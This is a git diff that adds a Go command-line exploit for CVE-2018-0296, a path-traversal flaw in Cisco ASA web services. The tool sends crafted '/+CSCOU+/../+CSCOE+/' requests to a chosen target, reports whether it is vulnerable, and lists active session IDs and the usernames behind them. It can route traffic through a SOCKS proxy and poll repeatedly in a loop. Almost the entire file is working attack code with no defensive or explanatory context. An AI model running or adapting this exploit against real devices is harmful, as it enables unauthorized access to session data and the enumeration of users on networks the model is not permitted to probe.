diff --git a/CVE-2018-0296.go b/CVE-2018-0296.go new file mode 100644 index 0000000..b7ed6a5 --- /dev/null +++ b/CVE-2018-0296.go @@ -0,0 +1,464 @@ +package main + +import ( + "fmt" + "time" + "net/http" + "crypto/tls" + "io/ioutil" + "os" + "net" + "golang.org/x/net/proxy" + "github.com/mkideal/cli" + "github.com/fatih/color" + "strings" +) +type argT struct { + cli.Helper + Urlstring string `cli:"u,url" usage:"Url of target device"` + //Urlfile string `cli:"U,file" usage:"File containing urls of target device"` + Sockshost string `cli:"i" usage:"IP of Socks Proxy"` + Socksport string `cli:"p" usage:"Port of Socks Proxy"` + Timesleep int `cli:"t,time" usage:"Number of seconds to sleep between loop"` + Loopmode bool `cli:"loop" usage:"Loop mode"` + //Debugmode bool `cli:"d,debug" usage:"Debug mode"` +} +func stringInSlice(str string, list []string) bool { + for _, v := range list { + if v == str { + return true + } + } + return false +} + +func main() { + cli.Run(new(argT), func(ctx *cli.Context) error { + argv := ctx.Argv().(*argT) + + var Debugmode=false + var userIDList []string + var userNameList []string + + var timeoutSec = 5 + var userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" + + var targetHost="" + if len(argv.Urlstring)>0 { + targetHost=argv.Urlstring + } + fmt.Println("[*] Checking: "+targetHost) + var firstLoop=true + + if len(argv.Sockshost)>0 && len(argv.Socksport)>0 { + dialer, err := proxy.SOCKS5("tcp", argv.Sockshost+":"+argv.Socksport, nil, &net.Dialer{ + Timeout: time.Duration(timeoutSec) * time.Second, + KeepAlive: time.Duration(timeoutSec) * time.Second, + }) + if err != nil { + fmt.Fprintln(os.Stderr, "can't connect to the proxy:", err) + os.Exit(1) + } else { + if argv.Loopmode { + var lastCount=0 + for { + httpTransport := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + timeout := time.Duration(time.Duration(timeoutSec) * time.Second) + httpClient := http.Client{ + Transport: httpTransport, + Timeout: timeout, + CheckRedirect: func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + }, + } + httpTransport.Dial = dialer.Dial + + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if firstLoop==true { + if strings.Contains(jsonText,"///sessions") { + fmt.Println("[+] "+targetHost+color.RedString(" [Vulnerable]")) + } + } + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(jsonText,"\n") + for _, w := range splitLines1 { + splitLines2:=strings.Split(w,"','") + for _, x := range splitLines2 { + if strings.Contains(x,"'name'") { + splitLines3:=strings.Split(x,"'name':'") + //fmt.Println(splitLines3[1]) + userIDList = append(userIDList, splitLines3[1]) + } + } + } + } + } + } else { + fmt.Println(err) + } + } else { + fmt.Println(err) + } + for _, v := range userIDList { + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+v + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(v,"','") + if strings.Contains(splitLines1[0],"'name':'user:") { + splitLines2:=strings.Split(splitLines1[0],"'name':'user:") + if !stringInSlice(splitLines2[1],userNameList) { + userNameList = append(userNameList,splitLines2[1]) + } + } + } + + } + } + } + } + } + + if len(userNameList)>0 { + if len(userNameList)>lastCount { + fmt.Println("[*] Usernames found") + for _, v := range userNameList { + fmt.Println(v) + } + fmt.Println("\n") + } + lastCount=len(userNameList) + } + } + if argv.Timesleep > 0 { + time.Sleep(time.Duration(argv.Timesleep) * time.Second) + } else { + time.Sleep(time.Duration(10) * time.Second) + } + firstLoop=false + } + } else { + httpTransport := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + + timeout := time.Duration(time.Duration(timeoutSec) * time.Second) + httpClient := http.Client{ + Transport: httpTransport, + Timeout: timeout, + CheckRedirect: func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + }, + } + httpTransport.Dial = dialer.Dial + + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if strings.Contains(jsonText,"///sessions") { + fmt.Println("[+] "+targetHost+color.RedString(" [Vulnerable]")) + } + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(jsonText,"\n") + for _, w := range splitLines1 { + splitLines2:=strings.Split(w,"','") + for _, x := range splitLines2 { + if strings.Contains(x,"'name'") { + splitLines3:=strings.Split(x,"'name':'") + //fmt.Println(splitLines3[1]) + userIDList = append(userIDList, splitLines3[1]) + } + } + } + } + } + } else { + fmt.Println(err) + } + } else { + fmt.Println(err) + } + for _, v := range userIDList { + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+v + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(v,"','") + if strings.Contains(splitLines1[0],"'name':'user:") { + splitLines2:=strings.Split(splitLines1[0],"'name':'user:") + if !stringInSlice(splitLines2[1],userNameList) { + userNameList = append(userNameList,splitLines2[1]) + } + } + } + + } + } + } + } + } + + if len(userNameList)>0 { + fmt.Println("[*] Usernames found") + for _, v := range userNameList { + fmt.Println(v) + } + fmt.Println("\n") + } + } + } + } + } else { + if argv.Loopmode { + var lastCount=0 + for { + httpTransport := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + + timeout := time.Duration(time.Duration(timeoutSec) * time.Second) + httpClient := http.Client{ + Transport: httpTransport, + Timeout: timeout, + CheckRedirect: func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + }, + } + + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if strings.Contains(jsonText,"///sessions") { + fmt.Println("[+] "+targetHost+color.RedString(" [Vulnerable]")) + } + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(jsonText,"\n") + for _, w := range splitLines1 { + splitLines2:=strings.Split(w,"','") + for _, x := range splitLines2 { + if strings.Contains(x,"'name'") { + splitLines3:=strings.Split(x,"'name':'") + //fmt.Println(splitLines3[1]) + userIDList = append(userIDList, splitLines3[1]) + } + } + } + } + } + } else { + fmt.Println(err) + } + } else { + fmt.Println(err) + } + for _, v := range userIDList { + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+v + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(v,"','") + if strings.Contains(splitLines1[0],"'name':'user:") { + splitLines2:=strings.Split(splitLines1[0],"'name':'user:") + if !stringInSlice(splitLines2[1],userNameList) { + userNameList = append(userNameList,splitLines2[1]) + } + } + } + + } + } + } + } + } + + if len(userNameList)>0 { + if len(userNameList)>lastCount { + fmt.Println("[*] Usernames found") + for _, v := range userNameList { + fmt.Println(v) + } + fmt.Println("\n") + } + lastCount=len(userNameList) + } + } + if argv.Timesleep > 0 { + time.Sleep(time.Duration(argv.Timesleep) * time.Second) + } else { + time.Sleep(time.Duration(10) * time.Second) + } + firstLoop=false + } + } else { + httpTransport := &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + } + + timeout := time.Duration(time.Duration(timeoutSec) * time.Second) + httpClient := http.Client{ + Transport: httpTransport, + Timeout: timeout, + CheckRedirect: func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + }, + } + + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if strings.Contains(jsonText,"///sessions") { + fmt.Println("[+] "+targetHost+color.RedString(" [Vulnerable]")) + } + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(jsonText,"\n") + for _, w := range splitLines1 { + splitLines2:=strings.Split(w,"','") + for _, x := range splitLines2 { + if strings.Contains(x,"'name'") { + splitLines3:=strings.Split(x,"'name':'") + userIDList = append(userIDList, splitLines3[1]) + } + } + } + } + } + } else { + fmt.Println(err) + } + } else { + fmt.Println(err) + } + for _, v := range userIDList { + newUrl := targetHost+"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"+v + req, err := http.NewRequest("GET", newUrl, nil) + if err==nil { + req.Header.Add("User-Agent", userAgent) + req.Header.Add("Accept-Encoding", "identity") + resp, err := httpClient.Do(req) + if err==nil { + body, err := ioutil.ReadAll(resp.Body) + if err==nil { + jsonText:=string(body) + if Debugmode==true { + fmt.Println(jsonText) + } + splitLines:=strings.Split(jsonText,"\n") + for _, v := range splitLines { + if strings.Contains(v,"'name'") { + splitLines1:=strings.Split(v,"','") + if strings.Contains(splitLines1[0],"'name':'user:") { + splitLines2:=strings.Split(splitLines1[0],"'name':'user:") + if !stringInSlice(splitLines2[1],userNameList) { + userNameList = append(userNameList,splitLines2[1]) + } + } + } + + } + } + } + } + } + + if len(userNameList)>0 { + fmt.Println("[*] Usernames found") + for _, v := range userNameList { + fmt.Println(v) + } + fmt.Println("\n") + } + } + } + } + + return nil + }) +}